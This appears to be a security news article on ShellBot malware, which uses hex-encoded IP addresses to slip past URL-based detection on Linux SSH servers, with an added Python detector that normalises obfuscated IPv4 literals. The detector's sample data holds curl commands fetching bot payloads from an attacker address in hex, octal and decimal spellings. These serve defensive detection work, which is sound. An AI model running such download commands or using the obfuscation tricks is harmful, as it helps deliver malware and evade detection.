Monday, October 23, 2023

ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers


Oct 12, 2023 | Newsroom

The threat actors behind ShellBot are leveraging IP addresses transformed into their hexadecimal notation to infiltrate poorly managed Linux SSH servers and deploy the DDoS malware.

“The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value,” the AhnLab Security Emergency response Center (ASEC) said in a new report published today.

ShellBot, also known by the name PerlBot, is known to breach servers that have weak SSH credentials via a dictionary attack, with the malware used as a conduit to stage DDoS attacks and deliver cryptocurrency miners.


Developed in Perl, the malware uses the IRC protocol to communicate with a command-and-control (C2) server.

The latest set of observed attacks involving ShellBot has been found to install the malware using a hexadecimal IP address in the download URL (hxxp://0x2763da4e/, which corresponds to 39.99.218[.]78), in what is seen as an attempt to evade URL-based detection signatures that match on the dotted-quad form.

“Due to the usage of curl for the download and its ability to support hexadecimal just like web browsers, ShellBot can be downloaded successfully on a Linux system environment and executed through Perl,” ASEC said.
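The hex literal works because curl, like a browser, hands a numeric host to inet_aton-style parsing, which also accepts a single 32-bit decimal, leading-zero octal components and shortened two- or three-part forms. The Python below is an added example, not code from the article or from ASEC's report: it canonicalises any of those IPv4 spellings back to a dotted quad so a detection rule can match on the real address rather than on one spelling of it. The sample download commands are constructed for the example; only the hex URL on the first line is the one the article reports, and all the numeric hosts deliberately resolve to that same address.

```python
"""Canonicalise obfuscated IPv4 literals (hex, octal, decimal, shortened)
back to dotted-quad so URL-based detections match on the real address.

Added example. The parsing rules follow inet_aton(3) semantics, which is
what curl and browsers accept for numeric hosts; nothing here is taken
from the ShellBot sample itself.
"""
import ipaddress
import re
from typing import List, Optional, Tuple

# Constructed sample commands in the style the article describes. Only the
# hex URL on the first line comes from the article; the rest are made up
# and every numeric host spells the same address differently.
SAMPLE_COMMANDS = [
    "curl -s hxxp://0x2763da4e/ -o /tmp/x.pl",      # hex (from the article)
    "curl -s http://39.99.218.78/ -o /tmp/x.pl",     # plain dotted quad
    "curl -s http://660855374/bot.pl",               # single 32-bit decimal
    "curl -s http://047.0143.0332.0116/bot.pl",      # dotted octal
    "curl -s http://0x27.0x63.0xda.0x4e/bot.pl",     # dotted hex
    "curl -s http://39.99.55886/bot.pl",             # three-part form
    "curl -s http://example.com/update.sh",          # hostname, not a literal
]

# One inet_aton component: "0x" hex, leading-zero octal, or plain decimal.
_PART_RE = re.compile(r"^(0[xX][0-9a-fA-F]*|0[0-7]*|[1-9][0-9]*)$")


def _parse_part(tok: str) -> Optional[int]:
    """Return the numeric value of one component, or None if malformed."""
    if not _PART_RE.match(tok):
        return None
    if tok[:2].lower() == "0x":
        return int(tok[2:], 16) if len(tok) > 2 else 0   # bare "0x" is 0
    if len(tok) > 1 and tok[0] == "0":
        return int(tok, 8)
    return int(tok, 10)


def inet_aton_style(host: str) -> Optional[str]:
    """Parse 1 to 4 dot-separated components the way inet_aton(3) does and
    return the canonical dotted quad, or None if the host is not a numeric
    IPv4 literal. All but the last component must fit in one byte; the
    last component fills whatever bytes remain."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *leading, last = values
    if any(v > 0xFF for v in leading):
        return None
    tail_bytes = 4 - len(leading)
    if last >= 1 << (8 * tail_bytes):
        return None
    addr = 0
    for v in leading:
        addr = (addr << 8) | v
    addr = (addr << (8 * tail_bytes)) | last
    return str(ipaddress.IPv4Address(addr))


def host_of(url: str) -> str:
    """Extract the host from a URL, undoing hxxp:// defanging first."""
    url = re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)
    m = re.match(r"^https?://([^/:?#]+)", url, flags=re.IGNORECASE)
    return m.group(1).lower() if m else ""


def find_downloads_from(commands: List[str], watched_ip: str) -> List[Tuple[str, str]]:
    """Return (host as written, command) for every command whose download
    URL resolves to watched_ip, however the literal was spelled."""
    hits = []
    for cmd in commands:
        for url in re.findall(r"(?:hxxps?|https?)://\S+", cmd, flags=re.IGNORECASE):
            host = host_of(url)
            if inet_aton_style(host) == watched_ip:
                hits.append((host, cmd))
    return hits


if __name__ == "__main__":
    for host, cmd in find_downloads_from(SAMPLE_COMMANDS, "39.99.218.78"):
        print(f"{host:>22} -> 39.99.218.78   {cmd}")
```

Two caveats worth knowing when wiring this into a rule. Python's own `ipaddress.ip_address("0x2763da4e")` raises `ValueError`, so a signature that validates hosts with it (or with inet_pton, which is equally strict) will simply skip the hex form; the lenient behaviour lives in inet_aton and in glibc's getaddrinfo, which is the resolver curl calls. And because the last component absorbs the remaining bytes, `39.99.55886` and `660855374` are just as valid as the hex form, so a rule that only rewrites `0x` prefixes is still incomplete.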

The development is a sign that ShellBot continues to see steady use in attacks against Linux systems.

With ShellBot capable of being used to install additional malware or launch different types of attacks from the compromised server, it is recommended that users switch to strong passwords and rotate them periodically to resist brute-force and dictionary attacks.


The disclosure also comes as ASEC revealed that attackers are weaponizing abnormal certificates with unusually long strings in the Subject Name and Issuer Name fields in a bid to distribute information stealer malware such as Lumma Stealer and a variant of RedLine Stealer known as RecordBreaker.

“These types of malware are distributed via malicious pages that are easily accessible through search engines (SEO poisoning), posing a threat to a wide range of unspecified users,” ASEC said. “These malicious pages mainly use keywords related to illegal programs such as serials, keygens, and cracks.”
